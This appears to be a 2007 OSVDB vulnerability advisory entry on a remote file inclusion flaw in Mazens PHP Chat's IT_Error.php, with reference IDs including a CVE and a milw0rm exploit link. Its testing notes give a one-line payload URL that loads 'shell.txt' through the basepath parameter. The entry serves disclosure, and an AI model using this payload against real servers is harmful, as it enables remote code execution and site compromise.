Mazens PHP Chat IT_Error.php basepath Variable Remote File Inclusion

2007-05-26T00:00:00
ID OSVDB:38087
Type osvdb
Reporter OSVDB
Modified 2007-05-26T00:00:00

Description

Manual Testing Notes

http://[target]/[chat_path]/include/pear/IT_Error.php?basepath=shell.txt?

References:

Related OSVDB ID: 38088 Related OSVDB ID: 38086 Generic Exploit URL: http://www.milw0rm.com/exploits/3994 FrSIRT Advisory: ADV-2007-1968 CVE-2007-2939 Bugtraq ID: 24171